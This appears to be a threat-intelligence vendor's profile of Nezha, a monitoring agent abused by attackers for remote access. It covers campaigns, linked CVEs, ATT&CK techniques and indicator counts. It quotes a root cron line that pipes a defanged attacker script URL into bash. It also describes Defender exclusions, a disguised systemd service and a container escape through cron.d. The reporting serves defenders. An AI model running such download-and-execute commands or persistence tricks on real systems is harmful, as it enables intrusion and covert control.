Nezha is an open-source server monitoring and remote management platform that has been repeatedly repurposed by threat actors as covert post-compromise access tooling. Although designed for legitimate administration and uptime monitoring, the agent can provide remote command execution, interactive terminal access, file transfer, and centralized management of large numbers of hosts from a dashboard, making it functionally useful as a lightweight remote access trojan when deployed without authorization.
Observed intrusion activity shows Nezha being installed after initial compromise of internet-facing systems, including exploitation of vulnerable public applications and web-shell-based footholds. In documented cases, attackers used exposed phpMyAdmin instances, log poisoning, and AntSword-managed web shells to deploy the Nezha agent, while other campaigns dropped it following exploitation of enterprise software vulnerabilities such as Ivanti EPMM flaws and React2Shell. Some operations used Nezha alongside other tunneling and command-and-control tools including FRP, GSocket, Ligolo-ng, MeshAgent, Cloudflared, Sliver, and Cobalt Strike.
Once installed, Nezha has been used to maintain footholds, execute commands on compromised servers, support hands-on-keyboard operations, and stage follow-on malware. Reported follow-on activity includes disabling or weakening endpoint protections, deploying Gh0st RAT for deeper persistence, installing backdoors, and in some campaigns supporting broader ransomware or botnet operations. Researchers have also observed actor-controlled Nezha dashboards managing more than 100 victim systems, with notable concentrations in Taiwan, Japan, South Korea, and Hong Kong in one campaign attributed with moderate confidence to China-nexus operators.
Nezha supports cross-platform deployment and has been observed on Windows and Linux systems, with reporting also noting use on routers and embedded devices. Its abuse reflects a broader trend in which legitimate administrative or monitoring software is weaponized for stealthy persistence and remote control because its traffic and behavior can resemble normal systems-management activity.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
3 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Given that attackers have previously chained stolen admin credentials from older EPMM CVEs like CVE-2026-1340, this chaining scenario is not theoretical.
Unit 42 observed widespread, automated exploitation of CVE-2026-1281 and CVE-2026-1340, two unauthenticated code injection vulnerabilities (CVSS 9.8 each) in legacy bash scripts tied to the In House Application Distribution feature.
Trend™ Research observed that CVE-2025-55182, as of this writing, is being exploited in-the-wild, and in several malware campaigns such as the emerald and nuts campaigns. ... CVE-2025-55182, which is a critical (CVSS 10.0) pre-authentication remote code execution vulnerability affecting React Server Components (RSC) used in React.js, Next.js, and related frameworks. | Several of these are attacks that execute Cobalt Strike beacons generated with Cross C2, deploy Nezha, Fast Reverse Proxy (FRP), the Sliver payload, and the Secret-Hunter payload.
17 distinct techniques documented for this family, organized by ATT&CK tactic.
The attacker then created a malicious cron job named ngk: * * * * * root curl hxxps://file.gpu5[.]com/linux_install.sh | bash
After installing the Nezha agent, it was used to run an interactive PowerShell so that Windows Defender exclusions could be created before deploying and running another executable called x.exe.
Trend™ Research observed that CVE-2025-55182, as of this writing, is being exploited in-the-wild... a critical (CVSS 10.0) pre-authentication remote code execution vulnerability affecting React Server Components (RSC)... An attacker can send malicious data that executes arbitrary code on your servers before any authentication occurs.
The attacker then created a malicious cron job named ngk: * * * * * root curl hxxps://file.gpu5[.]com/linux_install.sh | bash
sets a systemd service for persistence, claiming to be an “Rsyslog AV Agent Service”.
The attacker made use of [a Docker bind mount] to pass through the cron.d directory... By writing a job to this directory from within the container, the cron service running on the host detects the new job and executes it on the host, effectively allowing the attacker to escape the container.
Numerous new tools have been used to support command and control (C2) and stealth. These include publicly available tools like Nezha... and GSocket, which allows workstations on different private networks to connect and bypass firewalls.
T1071.001 — Application Layer Protocol: Web Protocols (Command and Control)
Several of these are attacks that execute Cobalt Strike beacons generated with Cross C2, deploy Nezha, Fast Reverse Proxy (FRP), the Sliver payload, and the Secret-Hunter payload.
45 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
23 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Backdoor used in the Medusa intrusion chain for command-and-control; the content also lists a Nezha backdoor IP and the file nezha-agent.exe.
A backdoor associated with infrastructure observed in the Medusa intrusion activity.
Open-source server monitoring agent repurposed by attackers as a botnet agent on compromised Ivanti EPMM servers.
An open-source monitoring agent/platform observed as part of actor-controlled infrastructure and used during the intrusion to support remote access and monitoring of compromised systems.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.